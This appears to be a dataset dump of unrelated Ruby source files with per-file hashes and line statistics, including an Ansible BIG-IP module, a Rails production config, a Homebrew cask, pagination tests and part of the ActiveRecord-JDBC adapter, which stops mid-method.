01c3ed699c054c034624e1d569e2a7471e99e6ec | 2,855 | # frozen_string_literal: true
# See LICENSE.txt at root of repository
# GENERATED FILE - DO NOT EDIT!!
require 'ansible/ruby/modules/base'
module Ansible
module Ruby
module Modules
# Manage Self-IPs on a BIG-IP system.
class Bigip_selfip < Base
# @return [String, nil] The IP addresses for the new self IP. This value is ignored upon update as addresses themselves cannot be changed after they are created.,This value is required when creating new self IPs.
attribute :address
validates :address, type: String
# @return [Array<String>, String, nil] Configure port lockdown for the Self IP. By default, the Self IP has a "default deny" policy. This can be changed to allow TCP and UDP ports as well as specific protocols. This list should contain C(protocol):C(port) values.
attribute :allow_service
validates :allow_service, type: TypeGeneric.new(String)
# @return [String] The self IP to create.,If this parameter is not specified, then it will default to the value supplied in the C(address) parameter.
attribute :name
validates :name, presence: true, type: String
# @return [String, nil] The netmask for the self IP. When creating a new Self IP, this value is required.
attribute :netmask
validates :netmask, type: String
# @return [:absent, :present, nil] When C(present), guarantees that the Self-IP exists with the provided attributes.,When C(absent), removes the Self-IP from the system.
attribute :state
validates :state, expression_inclusion: {:in=>[:absent, :present], :message=>"%{value} needs to be :absent, :present"}, allow_nil: true
# @return [Object, nil] The traffic group for the Self IP addresses in an active-active, redundant load balancer configuration. When creating a new Self IP, if this value is not specified, the default of C(/Common/traffic-group-local-only) will be used.
attribute :traffic_group
# @return [String, nil] The VLAN that the new self IPs will be on. When creating a new Self IP, this value is required.
attribute :vlan
validates :vlan, type: String
# @return [Integer, nil] The route domain id of the system. When creating a new Self IP, if this value is not specified, a default value of C(0) will be used.,This value cannot be changed after it is set.
attribute :route_domain
validates :route_domain, type: Integer
# @return [String, nil] Device partition to manage resources on. You can set different partitions for Self IPs, but the address used may not match any other address used by a Self IP. In that sense, Self IPs are not isolated by partitions as other resources on a BIG-IP are.
attribute :partition
validates :partition, type: String
end
end
end
end
| 58.265306 | 282 | 0.705079 |
217459164638068adbf9d6bf166c1793edcffd0e | 1,682 | module API
class Features < Grape::API
before { authenticated_as_admin! }
helpers do
def gate_value(params)
case params[:value]
when 'true'
true
when '0', 'false'
false
else
params[:value].to_i
end
end
def gate_target(params)
if params[:feature_group]
Feature.group(params[:feature_group])
elsif params[:user]
User.find_by_username(params[:user])
else
gate_value(params)
end
end
end
resource :features do
desc 'Get a list of all features' do
success Entities::Feature
end
get do
features = Feature.all
present features, with: Entities::Feature, current_user: current_user
end
desc 'Set the gate value for the given feature' do
success Entities::Feature
end
params do
requires :value, type: String, desc: '`true` or `false` to enable/disable, an integer for percentage of time'
optional :feature_group, type: String, desc: 'A Feature group name'
optional :user, type: String, desc: 'A GitLab username'
mutually_exclusive :feature_group, :user
end
post ':name' do
feature = Feature.get(params[:name])
target = gate_target(params)
value = gate_value(params)
case value
when true
feature.enable(target)
when false
feature.disable(target)
else
feature.enable_percentage_of_time(value)
end
present feature, with: Entities::Feature, current_user: current_user
end
end
end
end
| 25.484848 | 117 | 0.592152 |
bbbaa04be67c66127f05a6de7a3cccc0eb0cdfc1 | 220 | require 'spec_helper'
# Placeholder spec for the nodejs cookbook's default recipe — the single
# example is always skipped and exists only as a scaffold to be replaced
# with real expectations.
describe 'nodejs::default' do
  # Serverspec examples can be found at
  # http://serverspec.org/resource_types.html
  it 'does something' do
    skip 'Replace this with meaningful tests'
  end
end
| 22 | 45 | 0.740909 |
ab766ae77ef5e369cd19bfdcdd5b70ab30291673 | 3,891 | require "active_support/core_ext/integer/time"
Rails.application.configure do
  # Settings specified here will take precedence over those in config/application.rb.

  # Code is not reloaded between requests.
  config.cache_classes = true

  # Eager load code on boot. This eager loads most of Rails and
  # your application in memory, allowing both threaded web servers
  # and those relying on copy on write to perform better.
  # Rake tasks automatically ignore this option for performance.
  config.eager_load = true

  # Full error reports are disabled and caching is turned on.
  config.consider_all_requests_local       = false
  config.action_controller.perform_caching = true

  # Ensures that a master key has been made available in either ENV["RAILS_MASTER_KEY"]
  # or in config/master.key. This key is used to decrypt credentials (and other encrypted files).
  # config.require_master_key = true

  # Disable serving static files from the `/public` folder by default since
  # Apache or NGINX already handles this.
  config.public_file_server.enabled = ENV["RAILS_SERVE_STATIC_FILES"].present?

  # Compress CSS using a preprocessor.
  # config.assets.css_compressor = :sass

  # Do not fallback to assets pipeline if a precompiled asset is missed.
  config.assets.compile = false

  # Enable serving of images, stylesheets, and JavaScripts from an asset server.
  # config.asset_host = "http://assets.example.com"

  # Specifies the header that your server uses for sending files.
  # config.action_dispatch.x_sendfile_header = "X-Sendfile" # for Apache
  # config.action_dispatch.x_sendfile_header = "X-Accel-Redirect" # for NGINX

  # Store uploaded files on the local file system (see config/storage.yml for options).
  # NOTE(review): :local disk storage in production will not survive multi-server
  # or ephemeral deploys — confirm this is intentional.
  config.active_storage.service = :local

  # Mount Action Cable outside main process or domain.
  # config.action_cable.mount_path = nil
  # config.action_cable.url = "wss://example.com/cable"
  # config.action_cable.allowed_request_origins = [ "http://example.com", /http:\/\/example.*/ ]

  # Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
  # config.force_ssl = true

  # Include generic and useful information about system operation, but avoid logging too much
  # information to avoid inadvertent exposure of personally identifiable information (PII).
  config.log_level = :info

  # Prepend all log lines with the following tags.
  config.log_tags = [ :request_id ]

  # Use a different cache store in production.
  # config.cache_store = :mem_cache_store

  # Use a real queuing backend for Active Job (and separate queues per environment).
  # config.active_job.queue_adapter     = :resque
  # config.active_job.queue_name_prefix = "drkiq_production"

  config.action_mailer.perform_caching = false

  # Ignore bad email addresses and do not raise email delivery errors.
  # Set this to true and configure the email server for immediate delivery to raise delivery errors.
  # config.action_mailer.raise_delivery_errors = false

  # Enable locale fallbacks for I18n (makes lookups for any locale fall back to
  # the I18n.default_locale when a translation cannot be found).
  config.i18n.fallbacks = true

  # Don't log any deprecations.
  config.active_support.report_deprecations = false

  # Use default logging formatter so that PID and timestamp are not suppressed.
  config.log_formatter = ::Logger::Formatter.new

  # Use a different logger for distributed setups.
  # require "syslog/logger"
  # config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new "app-name")

  # Log to STDOUT (e.g. for containerized deploys) when the env var is set,
  # keeping the configured formatter and request-id tagging.
  if ENV["RAILS_LOG_TO_STDOUT"].present?
    logger           = ActiveSupport::Logger.new(STDOUT)
    logger.formatter = config.log_formatter
    config.logger    = ActiveSupport::TaggedLogging.new(logger)
  end

  # Do not dump schema after migrations.
  config.active_record.dump_schema_after_migration = false
end
| 41.393617 | 100 | 0.759188 |
2139315a15e5953ed935f51153809dd730b68de7 | 933 | cask "malus" do
version "1.9.6"
sha256 "5318b05bfead4b3bd08b25772af4c265d850bbd0af7ce2f57e7bb49421980ebe"
url "https://malus.s3cdn.net/uploads/Malus-mac_#{version.no_dots}.dmg",
verified: "malus.s3cdn.net/"
name "Malus"
desc "Proxy to help accessing various online media resources/services"
homepage "https://getmalus.com/"
livecheck do
url "https://api.getmalus.com/api/checkDesktopUpdate?type=mac"
strategy :sparkle, &:short_version
end
auto_updates true
depends_on macos: ">= :sierra"
app "Malus.app"
uninstall rmdir: "/Library/Application Support/Malus"
zap trash: [
"~/Library/Application Support/Malus",
"~/Library/Application Support/com.getmalus.malus",
"~/Library/Logs/com.getmalus.malus",
"~/Library/Caches/com.getmalus.malus",
"~/Library/Preferences/com.getmalus.malus.plist",
"~/Library/Saved Application State/com.getmalus.malus.savedState",
]
end
| 29.15625 | 75 | 0.721329 |
ff181a08ea20760fb6e9bcfc80bed0f25cc0d2a8 | 1,550 | class InitialSchema < ActiveRecord::Migration[5.2]
def change
create_table "customers" do |t|
t.string "first_name", default: "", null: false
t.string "middle_initial", default: "", null: false
t.string "last_name", default: "", null: false
t.string "address1", default: "", null: false
t.string "city", default: "", null: false
t.string "state", default: "", null: false
t.string "zip_code", default: "", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "items" do |t|
t.string "name", default: "", null: false
t.decimal "unit_price", precision: 8, scale: 2, default: "0.0", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "line_items" do |t|
t.datetime "added_at", null: false
t.decimal "price", precision: 8, scale: 2, default: "0.0", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.integer "purchase_order_id"
t.integer "item_id"
t.decimal "quantity", precision: 8, scale: 2
t.decimal "unit_price", precision: 8, scale: 2, default: "0.0"
end
create_table "purchase_orders" do |t|
t.string "title"
t.datetime "date"
t.decimal "total", precision: 8, scale: 2, default: "0.0", null: false
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.integer "customer_id"
end
end
end
| 36.046512 | 81 | 0.624516 |
bf025eba3fee051238887acbab58a05e22f5d257 | 756 | Warden::OpenID.configure do |config|
config.required_fields = 'email'
config.optional_fields = %w(fullname)
config.user_finder do |response|
user = User.where( :identity_url => response.identity_url ).first
unless user
fields = OpenID::SReg::Response.from_success_response(response)
user = User.new :identity_url => response.identity_url, :email => fields['email'], :full_name => fields['fullname']
user.skip_confirmation!
user.save!
end
user
end
end
# Lazily resolves the Mongoid database connection used by the OpenID store,
# so no connection is established at load time.
module OpenidMongodbStore
  # Memoized accessor for the Mongoid database handle.
  #
  # Uses a module-level instance variable instead of a class variable
  # (`@@database`): class variables are shared across the inheritance tree
  # and are an idiom to avoid; the memoization behavior is identical.
  #
  # @return [Object] the database handle returned by Mongoid.database
  def self.database
    @database ||= Mongoid.database
  end
end
# Mount Rack::OpenID (backed by the Mongoid-based nonce/association store)
# immediately after the cookie session store — NOTE(review): presumably so
# the OpenID middleware can read the session; confirm ordering requirement.
Lojban::Application.config.middleware.insert_after( ActionDispatch::Session::CookieStore, Rack::OpenID, OpenidMongodbStore::Store.new )
| 31.5 | 135 | 0.727513 |
e9b8fc21ae17868b22a35d03467feb006fdac0cf | 4,200 | # frozen_string_literal: true
require 'test_helper'
if defined? ActiveRecord
class ActiveRecordRelationMethodsTest < ActiveSupport::TestCase
sub_test_case '#total_count' do
setup do
@author = User.create! name: 'author'
@author2 = User.create! name: 'author2'
@author3 = User.create! name: 'author3'
@books = 2.times.map {|i| @author.books_authored.create!(title: "title%03d" % i) }
@books2 = 3.times.map {|i| @author2.books_authored.create!(title: "title%03d" % i) }
@books3 = 4.times.map {|i| @author3.books_authored.create!(title: "subject%03d" % i) }
@readers = 4.times.map { User.create! name: 'reader' }
@books.each {|book| book.readers << @readers }
end
teardown do
Book.delete_all
User.delete_all
Readership.delete_all
end
test 'total_count on not yet loaded Relation' do
assert_equal 0, User.where('1 = 0').page(1).total_count
assert_equal 0, User.where('1 = 0').page(1).per(10).total_count
assert_equal 7, User.page(1).total_count
assert_equal 7, User.page(1).per(10).total_count
assert_equal 7, User.page(2).total_count
assert_equal 7, User.page(2).per(10).total_count
assert_equal 7, User.page(2).per(2).total_count
end
test 'total_count on loded Relation' do
assert_equal 0, User.where('1 = 0').page(1).load.total_count
assert_equal 0, User.where('1 = 0').page(1).per(10).load.total_count
assert_equal 7, User.page(1).load.total_count
assert_equal 7, User.page(1).per(10).load.total_count
assert_equal 7, User.page(2).load.total_count
assert_equal 7, User.page(2).per(10).load.total_count
assert_equal 7, User.page(2).per(2).load.total_count
end
test 'it should reset total_count memoization when the scope is cloned' do
assert_equal 1, User.page.tap(&:total_count).where(name: 'author').total_count
end
test 'it should successfully count the results when the scope includes an order which references a generated column' do
assert_equal @readers.size, @author.readers.by_read_count.page(1).total_count
end
test 'it should keep includes and successfully count the results when the scope use conditions on includes' do
# Only @author and @author2 have books titled with the title00x pattern
assert_equal 2, User.includes(:books_authored).references(:books).where("books.title LIKE 'title00%'").page(1).total_count
end
test 'when the Relation has custom select clause' do
assert_nothing_raised do
User.select('*, 1 as one').page(1).total_count
end
end
test 'it should ignore the options for rails 4.1+ when total_count receives options' do
assert_equal 7, User.page(1).total_count(:name, distinct: true)
end
test 'it should not throw exception by passing options to count when the scope returns an ActiveSupport::OrderedHash' do
assert_nothing_raised do
@author.readers.by_read_count.page(1).total_count(:name, distinct: true)
end
end
test "it counts the number of rows, not the number of keys, with an alias field" do
@books.each {|book| book.readers << @readers[0..1] }
assert_equal 8, Readership.select('user_id, count(user_id) as read_count, book_id').group(:user_id, :book_id).page(1).total_count
end
test "it counts the number of rows, not the number of keys without an alias field" do
@books.each {|book| book.readers << @readers[0..1] }
assert_equal 8, Readership.select('user_id, count(user_id), book_id').group(:user_id, :book_id).page(1).total_count
end
test "throw an exception when calculating total_count when the query includes column aliases used by a group-by clause" do
assert_equal 3, Book.joins(authorships: :user).select("users.name as author_name").group('users.name').page(1).total_count
end
test 'total_count is calculable with page 1 per "5" (the string)' do
assert_equal 7, User.page(1).per('5').load.total_count
end
end
end
end
| 44.680851 | 137 | 0.670714 |
0309164678ac4ce43a661db4639e1a426e3037b8 | 25,129 | require 'active_record/version'
require 'active_record/connection_adapters/abstract_adapter'
require 'arjdbc/version'
require 'arjdbc/jdbc/java'
require 'arjdbc/jdbc/base_ext'
require 'arjdbc/jdbc/connection_methods'
require 'arjdbc/jdbc/driver'
require 'arjdbc/jdbc/column'
require 'arjdbc/jdbc/connection'
require 'arjdbc/jdbc/callbacks'
require 'arjdbc/jdbc/extension'
require 'arjdbc/jdbc/type_converter'
require 'arjdbc/abstract/core'
require 'arjdbc/abstract/connection_management'
require 'arjdbc/abstract/database_statements'
require 'arjdbc/abstract/transaction_support'
module ActiveRecord
module ConnectionAdapters
# Built on top of `ActiveRecord::ConnectionAdapters::AbstractAdapter` which
# provides the abstract interface for database-specific functionality, this
# class serves 2 purposes in AR-JDBC :
# - as a base class for sub-classes
# - usable standalone (or with a mixed in adapter spec module)
#
# Historically this class is mostly been used standalone and that's still a
# valid use-case esp. since (with it's `arjdbc.jdbc.RubyJdbcConnectionClass`)
# JDBC provides a unified interface for all databases in Java it tries to do
# it's best implementing all `ActiveRecord` functionality on top of that.
# This might no be perfect that's why it checks for a `config[:adapter_spec]`
# module (or tries to resolve one from the JDBC driver's meta-data) and if
# the database has "extended" AR-JDBC support mixes in the given module for
# each adapter instance.
# This is sufficient for most database specific specs we support, but for
# compatibility with native (MRI) adapters it's perfectly fine to sub-class
# the adapter and override some of its API methods.
class JdbcAdapter < AbstractAdapter
include Jdbc::ConnectionPoolCallbacks
include ArJdbc::Abstract::Core
include ArJdbc::Abstract::ConnectionManagement
include ArJdbc::Abstract::DatabaseStatements
include ArJdbc::Abstract::TransactionSupport
attr_reader :prepared_statements
def self.new(connection, logger = nil, pool = nil)
adapter = super
Jdbc::JndiConnectionPoolCallbacks.prepare(adapter, adapter.instance_variable_get(:@connection))
adapter
end
# Initializes the (JDBC connection) adapter instance.
# The passed configuration Hash's keys are symbolized, thus changes to
# the original `config` keys won't be reflected in the adapter.
# If the adapter's sub-class or the spec module that this instance will
# extend in responds to `configure_connection` than it will be called.
# @param connection an (optional) connection instance
# @param logger the `ActiveRecord::Base.logger` to use (or nil)
# @param config the database configuration
# @note `initialize(logger, config)` with 2 arguments is supported as well
def initialize(connection, logger = nil, config = nil)
@config = config.respond_to?(:symbolize_keys) ? config.symbolize_keys : config
# FIXME: Rails 5 defaults to prepared statements on and we do not seem
# to work yet. So default to off unless it is requested until that is
# fixed.
@config[:prepared_statements] = false if !@config[:prepared_statements]
# NOTE: JDBC 4.0 drivers support checking if connection isValid
# thus no need to @config[:connection_alive_sql] ||= 'SELECT 1'
#
# NOTE: setup to retry 5-times previously - maybe do not set at all ?
@config[:retry_count] ||= 1
@config[:adapter_spec] = adapter_spec(@config) unless @config.key?(:adapter_spec)
spec = @config[:adapter_spec]
super(connection, logger, @config)
# kind of like `extend ArJdbc::MyDB if self.class == JdbcAdapter` :
klass = @config[:adapter_class]
extend spec if spec && ( ! klass || klass == JdbcAdapter)
end
# Returns the (JDBC) connection class to be used for this adapter.
# This is used by (database specific) spec modules to override the class
# used assuming some of the available methods have been re-defined.
# @see ActiveRecord::ConnectionAdapters::JdbcConnection
def jdbc_connection_class(spec)
connection_class = spec.jdbc_connection_class if spec && spec.respond_to?(:jdbc_connection_class)
connection_class ? connection_class : ::ActiveRecord::ConnectionAdapters::JdbcConnection
end
# Returns the (JDBC) `ActiveRecord` column class for this adapter.
# This is used by (database specific) spec modules to override the class.
# @see ActiveRecord::ConnectionAdapters::JdbcColumn
def jdbc_column_class
::ActiveRecord::ConnectionAdapters::JdbcColumn
end
# Locate the specialized (database specific) adapter specification module
# if one exists based on provided configuration data. This module will than
# extend an instance of the adapter (unless an `:adapter_class` provided).
#
# This method is called during {#initialize} unless an explicit
# `config[:adapter_spec]` is set.
# @param config the configuration to check for `:adapter_spec`
# @return [Module] the database specific module
def adapter_spec(config)
dialect = (config[:dialect] || config[:driver]).to_s
::ArJdbc.modules.each do |constant| # e.g. ArJdbc::MySQL
if constant.respond_to?(:adapter_matcher)
spec = constant.adapter_matcher(dialect, config)
return spec if spec
end
end
if (config[:jndi] || config[:data_source]) && ! config[:dialect]
begin
data_source = config[:data_source] ||
Java::JavaxNaming::InitialContext.new.lookup(config[:jndi])
connection = data_source.getConnection
config[:dialect] = connection.getMetaData.getDatabaseProductName
rescue Java::JavaSql::SQLException => e
warn "failed to set database :dialect from connection meda-data (#{e})"
else
return adapter_spec(config) # re-try matching a spec with set config[:dialect]
ensure
connection.close if connection # return to the pool
end
end
nil
end
ADAPTER_NAME = 'JDBC'.freeze
# @return [String] the 'JDBC' adapter name.
def adapter_name
ADAPTER_NAME
end
# @override
# Will return true even when native adapter classes passed in
# e.g. `jdbc_adapter.is_a? ConnectionAdapter::PostgresqlAdapter`
#
# This is only necessary (for built-in adapters) when
# `config[:adapter_class]` is forced to `nil` and the `:adapter_spec`
# module is used to extend the `JdbcAdapter`, otherwise we replace the
# class constants for built-in adapters (MySQL, PostgreSQL and SQLite3).
def is_a?(klass)
# This is to fake out current_adapter? conditional logic in AR tests
if klass.is_a?(Class) && klass.name =~ /#{adapter_name}Adapter$/i
true
else
super
end
end
# @deprecated re-implemented - no longer used
# @return [Hash] the AREL visitor to use
# If there's a `self.arel2_visitors(config)` method on the adapter
# spec than it is preferred and will be used instead of this one.
def self.arel2_visitors(config)
{ 'jdbc' => ::Arel::Visitors::ToSql }
end
# @deprecated re-implemented - no longer used
# @see #arel2_visitors
def self.configure_arel2_visitors(config)
visitors = ::Arel::Visitors::VISITORS
klass = config[:adapter_spec]
klass = self unless klass.respond_to?(:arel2_visitors)
visitor = nil
klass.arel2_visitors(config).each do |name, arel|
visitors[name] = ( visitor = arel )
end
if visitor && config[:adapter] =~ /^(jdbc|jndi)$/
visitors[ config[:adapter] ] = visitor
end
visitor
end
# DB specific types are detected but adapter specs (or extenders) are
# expected to hand tune these types for concrete databases.
# @return [Hash] the native database types
# @override
def native_database_types
@native_database_types ||= begin
types = @connection.native_database_types
modify_types(types)
types
end
end
# @override introduced in AR 4.2
def valid_type?(type)
! native_database_types[type].nil?
end
# Allows for modification of the detected native types.
# @param types the resolved native database types
# @see #native_database_types
def modify_types(types)
types
end
# Abstract adapter default implementation does nothing silently.
# @override
def structure_dump
raise NotImplementedError, "structure_dump not supported"
end
# JDBC adapters support migration.
# @return [true]
# @override
def supports_migrations?
true
end
# Returns the underlying database name.
# @override
def database_name
@connection.database_name
end
# @private
def native_sql_to_type(type)
if /^(.*?)\(([0-9]+)\)/ =~ type
tname, limit = $1, $2.to_i
ntypes = native_database_types
if ntypes[:primary_key] == type
return :primary_key, nil
else
ntypes.each do |name, val|
if name == :primary_key
next
end
if val[:name].downcase == tname.downcase &&
( val[:limit].nil? || val[:limit].to_i == limit )
return name, limit
end
end
end
elsif /^(.*?)/ =~ type
tname = $1
ntypes = native_database_types
if ntypes[:primary_key] == type
return :primary_key, nil
else
ntypes.each do |name, val|
if val[:name].downcase == tname.downcase && val[:limit].nil?
return name, nil
end
end
end
else
return :string, 255
end
return nil, nil
end
def columns(table_name, name = nil)
@connection.columns(table_name.to_s)
end
# @override
def supports_views?
@connection.supports_views?
end
# Similar to {#exec_query} except it returns "raw" results in an array
# where each rows is a hash with keys as columns (just like Rails used to
# do up until 3.0) instead of wrapping them in a {#ActiveRecord::Result}.
# @param sql the query string (or AREL object)
# @param name logging marker for the executed SQL statement log entry
# @param binds the bind parameters
# @yield [v1, v2] depending on the row values returned from the query
# In case a block is given it will yield each row from the result set
# instead of returning mapped query results in an array.
# @return [Array] unless a block is given
def exec_query_raw(sql, name = 'SQL', binds = [], &block)
if sql.respond_to?(:to_sql)
sql = to_sql(sql, binds); to_sql = true
end
if prepared_statements?
log(sql, name, binds) { @connection.execute_query_raw(sql, binds, &block) }
else
sql = suble_binds(sql, binds) unless to_sql # deprecated behavior
log(sql, name) { @connection.execute_query_raw(sql, &block) }
end
end
# @private
# @override
def select_rows(sql, name = nil, binds = [])
exec_query_raw(sql, name, binds).map!(&:values)
end
# Executes the SQL statement in the context of this connection.
# The return value from this method depends on the SQL type (whether
# it's a SELECT, INSERT etc.). For INSERTs a generated id might get
# returned while for UPDATE statements the affected row count.
# Please note that this method returns "raw" results (in an array) for
# statements that return a result set, while {#exec_query} is expected to
# return a `ActiveRecord::Result` (since AR 3.1).
# @note This method does not use prepared statements.
# @note The method does not emulate various "native" `execute` results on MRI.
# @see #exec_query
# @see #exec_insert
# @see #exec_update
def execute(sql, name = nil, binds = nil)
sql = suble_binds to_sql(sql, binds), binds if binds
if name == :skip_logging
_execute(sql, name)
else
log(sql, name) { _execute(sql, name) }
end
end
# We need to do it this way, to allow Rails stupid tests to always work
# even if we define a new `execute` method. Instead of mixing in a new
# `execute`, an `_execute` should be mixed in.
# @deprecated it was only introduced due tests
# @private
def _execute(sql, name = nil)
@connection.execute(sql)
end
private :_execute
# Kind of `execute(sql) rescue nil` but logging failures at debug level only.
def execute_quietly(sql, name = 'SQL')
log(sql, name) do
begin
_execute(sql)
rescue => e
logger.debug("#{e.class}: #{e.message}: #{sql}")
end
end
end
# @override
def tables(name = nil)
@connection.tables
end
# @override
def table_exists?(name)
return false unless name
@connection.table_exists?(name) # schema_name = nil
end
# @override
def data_sources
tables
end if ArJdbc::AR42
# @override
def data_source_exists?(name)
table_exists?(name)
end if ArJdbc::AR42
# @override
def indexes(table_name, name = nil, schema_name = nil)
@connection.indexes(table_name, name, schema_name)
end
# @override
def pk_and_sequence_for(table)
( key = primary_key(table) ) ? [ key, nil ] : nil
end
# @override
def primary_keys(table)
@connection.primary_keys(table)
end
# @override
def foreign_keys(table_name)
@connection.foreign_keys(table_name)
end if ArJdbc::AR42
# Does our database (+ its JDBC driver) support foreign-keys?
# @since 1.3.18
# @override
def supports_foreign_keys?
@connection.supports_foreign_keys?
end if ArJdbc::AR42
# @deprecated Rather use {#update_lob_value} instead.
def write_large_object(*args)
@connection.write_large_object(*args)
end
# @param record the record e.g. `User.find(1)`
# @param column the model's column e.g. `User.columns_hash['photo']`
# @param value the lob value - string or (IO or Java) stream
def update_lob_value(record, column, value)
@connection.update_lob_value(record, column, value)
end
if ActiveRecord::VERSION::MAJOR == 3 && ActiveRecord::VERSION::MINOR == 0
#attr_reader :visitor unless method_defined?(:visitor) # not in 3.0
# @private
def to_sql(arel, binds = nil)
# NOTE: can not handle `visitor.accept(arel.ast)` right
arel.respond_to?(:to_sql) ? arel.send(:to_sql) : arel
end
elsif ActiveRecord::VERSION::MAJOR < 3 # AR-2.3 'fake' #to_sql method
# @private
def to_sql(sql, binds = nil)
sql
end
end
protected
# @override so that we do not have to care having 2 arguments on 3.0
def log(sql, name = nil, binds = [])
unless binds.blank?
binds = binds.map do |column, value|
column ? [column.name, value] : [nil, value]
end
sql = "#{sql} #{binds.inspect}"
end
super(sql, name || 'SQL') # `log(sql, name)` on AR <= 3.0
end if ActiveRecord::VERSION::MAJOR < 3 ||
( ActiveRecord::VERSION::MAJOR == 3 && ActiveRecord::VERSION::MINOR < 1 )
# Take an id from the result of an INSERT query.
# @return [Integer, NilClass]
def last_inserted_id(result)
if result.is_a?(Hash) || result.is_a?(ActiveRecord::Result)
result.first.first[1] # .first = { "id"=>1 } .first = [ "id", 1 ]
else
result
end
end
# @private
def last_inserted_id(result)
if result.is_a?(Hash)
result.first.first[1] # .first = { "id"=>1 } .first = [ "id", 1 ]
else
result
end
end unless defined? ActiveRecord::Result
# NOTE: make sure if adapter overrides #table_definition that it will
# work on AR 3.x as well as 4.0
if ActiveRecord::VERSION::MAJOR > 3
# aliasing #create_table_definition as #table_definition :
alias table_definition create_table_definition
# `TableDefinition.new native_database_types, name, temporary, options`
# and ActiveRecord 4.1 supports optional `as` argument (which defaults
# to nil) to provide the SQL to use to generate the table:
# `TableDefinition.new native_database_types, name, temporary, options, as`
# @private
def create_table_definition(*args)
table_definition(*args)
end
# @note AR-4x arguments expected: `(name, temporary, options)`
# @private documented bellow
def new_table_definition(table_definition, *args)
if ActiveRecord::VERSION::MAJOR > 4
table_definition.new(*args)
else
table_definition.new native_database_types, *args
end
end
private :new_table_definition
# @private
def new_index_definition(table, name, unique, columns, lengths,
orders = nil, where = nil, type = nil, using = nil)
IndexDefinition.new(table, name, unique, columns, lengths, orders, where, type, using)
end
private :new_index_definition
#
# Provides backwards-compatibility on ActiveRecord 4.1 for DB adapters
# that override this and than call super expecting to work.
# @note This method is available in 4.0 but won't be in 4.1
# @private
def add_column_options!(sql, options)
sql << " DEFAULT #{quote(options[:default], options[:column])}" if options_include_default?(options)
# must explicitly check for :null to allow change_column to work on migrations
sql << " NOT NULL" if options[:null] == false
sql << " AUTO_INCREMENT" if options[:auto_increment] == true
end
public :add_column_options!
else # AR < 4.0
# Helper to easily override #table_definition (on AR 3.x/4.0) as :
# ```
# def table_definition(*args)
# new_table_definition(TableDefinition, *args)
# end
# ```
def new_table_definition(table_definition, *args)
table_definition.new(self) # args ignored only used for 4.0
end
private :new_table_definition
# @private (:table, :name, :unique, :columns, :lengths, :orders)
def new_index_definition(table, name, unique, columns, lengths,
orders = nil, where = nil, type = nil, using = nil)
IndexDefinition.new(table, name, unique, columns, lengths, orders)
end
# @private (:table, :name, :unique, :columns, :lengths)
def new_index_definition(table, name, unique, columns, lengths,
orders = nil, where = nil, type = nil, using = nil)
IndexDefinition.new(table, name, unique, columns, lengths)
end if ActiveRecord::VERSION::STRING < '3.2'
private :new_index_definition
end
# @return whether `:prepared_statements` are to be used
def prepared_statements?
return @prepared_statements unless (@prepared_statements ||= nil).nil?
@prepared_statements = self.class.prepared_statements?(config)
end
# Allows changing the prepared statements setting for this connection.
# @see #prepared_statements?
#def prepared_statements=(statements)
# @prepared_statements = statements
#end
def self.prepared_statements?(config)
config.key?(:prepared_statements) ?
type_cast_config_to_boolean(config.fetch(:prepared_statements)) :
false # off by default - NOTE: on AR 4.x it's on by default !?
end
if @@suble_binds = Java::JavaLang::System.getProperty('arjdbc.adapter.suble_binds')
@@suble_binds = Java::JavaLang::Boolean.parseBoolean(@@suble_binds)
else
@@suble_binds = ActiveRecord::VERSION::MAJOR < 4 # due compatibility
end
def self.suble_binds?; @@suble_binds; end
def self.suble_binds=(flag); @@suble_binds = flag; end
private
# @private Supporting "string-subling" on AR 4.0 would require {#to_sql}
# to consume binds parameters otherwise it happens twice e.g. for a record
# insert it is called during {#insert} as well as on {#exec_insert} ...
# but that than leads to other issues with libraries that save the binds
# array and run a query again since it's the very same instance on 4.0 !
def suble_binds(sql, binds)
sql
end
# @deprecated No longer used, kept for 1.2 API compatibility.
def extract_sql(arel)
arel.respond_to?(:to_sql) ? arel.send(:to_sql) : arel
end
if ActiveRecord::VERSION::MAJOR > 2
# Helper useful during {#quote} since AREL might pass in it's literals
# to be quoted, fixed since AREL 4.0.0.beta1 : http://git.io/7gyTig
def sql_literal?(value); ::Arel::Nodes::SqlLiteral === value; end
else
# @private
def sql_literal?(value); false; end
end
# Helper to get local/UTC time (based on `ActiveRecord::Base.default_timezone`).
def get_time(value)
get = ::ActiveRecord::Base.default_timezone == :utc ? :getutc : :getlocal
value.respond_to?(get) ? value.send(get) : value
end
protected
# @return whether the given SQL string is a 'SELECT' like
# query (returning a result set)
def self.select?(sql)
JdbcConnection::select?(sql)
end
# @return whether the given SQL string is an 'INSERT' query
def self.insert?(sql)
JdbcConnection::insert?(sql)
end
# @return whether the given SQL string is an 'UPDATE' (or 'DELETE') query
def self.update?(sql)
! select?(sql) && ! insert?(sql)
end
unless defined? AbstractAdapter.type_cast_config_to_integer
# @private
def self.type_cast_config_to_integer(config)
config =~ /\A\d+\z/ ? config.to_i : config
end
end
# @private
def self.type_cast_config_to_boolean(config)
config == 'false' ? false : (config == 'true' ? true : config)
end
public
# @note Used by Java API to convert dates from (custom) SELECTs (might get refactored).
# @private
def _string_to_date(value); jdbc_column_class.string_to_date(value) end
# @note Used by Java API to convert times from (custom) SELECTs (might get refactored).
# @private
def _string_to_time(value); jdbc_column_class.string_to_dummy_time(value) end
# @note Used by Java API to convert times from (custom) SELECTs (might get refactored).
# @private
def _string_to_timestamp(value); jdbc_column_class.string_to_time(value) end
# On AR above 4.2 the column class may no longer implement the legacy
# string_to_* helpers, so each conversion falls back to an
# ActiveRecord::Type value object, memoized in a class variable.
# NOTE(review): the guard compares version *strings* lexicographically —
# fine for the 4.x/5.x series this targets; verify before relying on it
# for hypothetical two-digit major versions.
if ActiveRecord::VERSION::STRING > '4.2'
# Memoized ActiveRecord::Type::Date instance (lazily built below).
# @private
@@_date = nil
# @private
def _string_to_date(value)
if jdbc_column_class.respond_to?(:string_to_date)
jdbc_column_class.string_to_date(value)
else
# cast_value is private on AR::Type objects, hence the send.
(@@_date ||= ActiveRecord::Type::Date.new).send(:cast_value, value)
end
end
# Memoized ActiveRecord::Type::Time instance (lazily built below).
# @private
@@_time = nil
# @private
def _string_to_time(value)
if jdbc_column_class.respond_to?(:string_to_dummy_time)
jdbc_column_class.string_to_dummy_time(value)
